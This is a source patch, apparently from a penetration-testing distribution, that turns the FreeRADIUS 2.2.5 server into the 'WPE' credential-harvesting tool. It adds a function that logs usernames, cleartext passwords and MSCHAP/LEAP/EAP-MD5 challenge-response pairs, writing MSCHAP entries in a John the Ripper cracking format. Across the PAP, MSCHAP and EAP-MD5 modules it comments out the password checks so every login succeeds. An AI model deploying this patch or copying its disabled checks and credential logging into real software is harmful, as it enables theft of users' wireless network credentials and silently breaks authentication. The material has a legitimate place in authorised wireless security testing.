pentoo-overlay/net-dialup/freeradius/files/freeradius-2.2.5-wpe.patch

File ./freeradius-2.2.5.orig/.ipc_in is a fifo while file ./freeradius-2.2.5/.ipc_in is a fifo
File ./freeradius-2.2.5.orig/.ipc_out is a fifo while file ./freeradius-2.2.5/.ipc_out is a fifo
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in	2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in	2014-05-18 20:13:04.234827890 +0800
@@ -499,6 +499,7 @@
 
 #  The program to execute to do concurrency checks.
 checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
 
 # SECURITY CONFIGURATION
 #
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users	2014-05-18 20:16:52.153826780 +0800
@@ -201,3 +201,7 @@
 # 	Service-Type = Administrative-User
 
 # On no match, the user is denied access.
+
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h	2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h	2014-05-18 20:17:59.921826451 +0800
@@ -369,6 +369,7 @@
 #endif
 	char		*log_file;
 	char		*checkrad;
+	char		*wpelogfile;
 	const char      *pid_file;
 	rad_listen_t	*listen;
 	int		syslog_facility;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c	2014-05-18 20:19:11.561826102 +0800
@@ -350,6 +350,7 @@
 					return -1;
 				}
 				RDEBUG2("User-Password in the request is correct.");
+				log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
 				break;
 
 			} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c	2014-05-18 20:23:55.063824722 +0800
@@ -27,6 +27,8 @@
 RCSID("$Id: ed6baf3e2c7a6e92f49de7335bb9747aea2e7ca2 $")
 
 #include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
 
 #ifdef HAVE_SYS_STAT_H
 #include <sys/stat.h>
@@ -191,6 +193,64 @@
 	return r;
 }
 
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+	FILE		*logfd;
+	time_t		nowtime;
+	unsigned int	count;
+
+	/* Get wpelogfile parameter and log data */
+	if (mainconfig.wpelogfile == NULL) {
+		logfd = stderr;
+	} else {
+		logfd = fopen(mainconfig.wpelogfile, "a");
+		if (logfd == NULL) {
+			DEBUG2("  rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+			logfd = stderr;
+		}
+	}
+
+	nowtime = time(NULL);
+	fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+	if (username != NULL) {
+		fprintf(logfd, "\tusername: %s\n", username);
+	}
+	if (password != NULL) {
+		fprintf(logfd, "\tpassword: %s\n", password);
+	}
+
+	if (challen != 0) {
+		fprintf(logfd, "\tchallenge: ");
+		for (count=0; count!=(challen-1); count++) {
+			fprintf(logfd, "%02x:",challenge[count]);
+		}
+		fprintf(logfd, "%02x\n",challenge[challen-1]);
+	}
+
+	if (resplen != 0) {
+		fprintf(logfd, "\tresponse: ");
+		for (count=0; count!=(resplen-1); count++) {
+			fprintf(logfd, "%02x:",response[count]);
+		}
+		fprintf(logfd, "%02x\n",response[resplen-1]);
+	}
+
+	if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+		fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+		for (count=0; count<challen; count++) {
+			fprintf(logfd, "%02x",challenge[count]);
+		}
+		fprintf(logfd,"$");
+		for (count=0; count<resplen; count++) {
+			fprintf(logfd, "%02x",response[count]);
+		}
+		fprintf(logfd,"\n");
+	}
+
+	fprintf(logfd, "\n");
+	fclose(logfd);
+}
 
 /*
  *      Dump a whole list of attributes to DEBUG2
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c	2014-05-18 20:24:49.415824458 +0800
@@ -250,6 +250,8 @@
 
 	{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
 
+	{ "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
+
 #ifdef WITH_PROXY
 	{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
 #endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c	2014-05-18 20:25:46.103824182 +0800
@@ -65,7 +65,7 @@
 int debug_flag = 0;
 int check_config = FALSE;
 
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
 #ifdef RADIUSD_VERSION_COMMIT
 " (git #" RADIUSD_VERSION_COMMIT ")"
 #endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2014-05-18 20:27:16.391823742 +0800
@@ -244,11 +244,11 @@
  *	Verify the MS-CHAP response from the user.
  */
 int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-		   leap_session_t *session)
+		   leap_session_t *session, char *username)
 {
 	unsigned char ntpwdhash[16];
 	unsigned char response[24];
-
+	unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 
 	/*
 	 *	No password or previous packet.  Die.
@@ -266,6 +266,7 @@
 	 */
 	eapleap_mschap(ntpwdhash, session->peer_challenge, response);
 	if (memcmp(response, packet->challenge, 24) == 0) {
+		log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
 		DEBUG2("  rlm_eap_leap: NtChallengeResponse from AP is valid");
 		memcpy(session->peer_response, response, sizeof(response));
 		return 1;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2014-05-18 20:27:16.391823742 +0800
@@ -68,7 +68,7 @@
 LEAP_PACKET 	*eapleap_extract(EAP_DS *auth);
 LEAP_PACKET 	*eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
 int		eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-			       leap_session_t *session);
+			       leap_session_t *session, char *username);
 LEAP_PACKET	*eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
 				VALUE_PAIR *user_name, VALUE_PAIR* password,
 				leap_session_t *session,
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2014-05-18 20:27:16.392823742 +0800
@@ -133,7 +133,7 @@
 	switch (session->stage) {
 	case 4:			/* Verify NtChallengeResponse */
 		DEBUG2("  rlm_eap_leap: Stage 4");
-		rcode = eapleap_stage4(packet, password, session);
+		rcode = eapleap_stage4(packet, password, session, username);
 		session->stage = 6;
 
 		/*
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2014-05-18 20:27:16.392823742 +0800
@@ -202,9 +202,13 @@
 	/*
 	 *	The length of the response is always 16 for MD5.
 	 */
+	/* WPE FTW
 	if (memcmp(output, packet->value, 16) != 0) {
 		return 0;
 	}
+	*/
+	log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+		packet->value, 16); 
 	return 1;
 }
 
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c	2014-05-18 20:28:28.879823390 +0800
@@ -681,9 +681,11 @@
 static int do_mschap(rlm_mschap_t *inst,
 		     REQUEST *request, VALUE_PAIR *password,
 		     uint8_t *challenge, uint8_t *response,
-		     uint8_t *nthashhash, int do_ntlm_auth)
+		     uint8_t *nthashhash, int do_ntlm_auth, char *username)
 {
 	uint8_t		calculated[24];
+	
+	log_wpe("mschap", username, NULL, challenge, 8, response, 24);
 
 	/*
 	 *	Do normal authentication.
@@ -698,9 +700,11 @@
 		}
 
 		smbdes_mschap(password->vp_strvalue, challenge, calculated);
+		/* WPE FTW
 		if (rad_digest_cmp(response, calculated, 24) != 0) {
 			return -1;
 		}
+		*/
 
 		/*
 		 *	If the password exists, and is an NT-Password,
@@ -1151,7 +1155,7 @@
 		 */
 		if (do_mschap(inst, request, password, challenge->vp_octets,
 			      response->vp_octets + offset, nthashhash,
-			      do_ntlm_auth) < 0) {
+			      do_ntlm_auth, request->username->vp_strvalue) < 0) {
 			RDEBUG2("MS-CHAP-Response is incorrect.");
 			goto do_error;
 		}
@@ -1270,7 +1274,7 @@
 
 		if (do_mschap(inst, request, nt_password, mschapv1_challenge,
 			      response->vp_octets + 26, nthashhash,
-			      do_ntlm_auth) < 0) {
+			      do_ntlm_auth, request->username->vp_strvalue) < 0) {
 			int i;
 			char buffer[128];
 
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c	2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c	2014-05-18 20:28:28.880823390 +0800
@@ -526,6 +526,8 @@
 		RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
 		return RLM_MODULE_INVALID;
 	}
+       log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+                NULL, 0, NULL, 0);
 
 	/*
 	 *	The user MUST supply a non-zero-length password.
@@ -609,6 +611,7 @@
 	do_clear:
 		RDEBUG("Using clear text password \"%s\"",
 		      vp->vp_strvalue);
+		/* WPE FTW
 		if ((vp->length != request->password->length) ||
 		    (rad_digest_cmp(vp->vp_strvalue,
 				request->password->vp_strvalue,
@@ -616,6 +619,7 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
 			goto make_msg;
 		}
+		*/
 	done:
 		RDEBUG("User authenticated successfully");
 		return RLM_MODULE_OK;
@@ -648,10 +652,12 @@
 		fr_MD5Update(&md5_context, request->password->vp_octets,
 			     request->password->length);
 		fr_MD5Final(digest, &md5_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -675,10 +681,12 @@
 		/*
 		 *	Compare only the MD5 hash results, not the salt.
 		 */
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -697,10 +705,12 @@
 		fr_SHA1Update(&sha1_context, request->password->vp_octets,
 			      request->password->length);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -721,10 +731,12 @@
 			   request->password->length);
 		fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -746,11 +758,13 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE FTW
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -770,16 +784,20 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE FTW
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+		*/
 		make_msg:
+		/*
 			RDEBUG("Passwords don't match");
 			module_fmsg_vp = pairmake("Module-Failure-Message",
 						  module_fmsg, T_OP_EQ);
 			pairadd(&request->packet->vps, module_fmsg_vp);
 			return RLM_MODULE_REJECT;
 		}
+		*/
 		goto done;
 		break;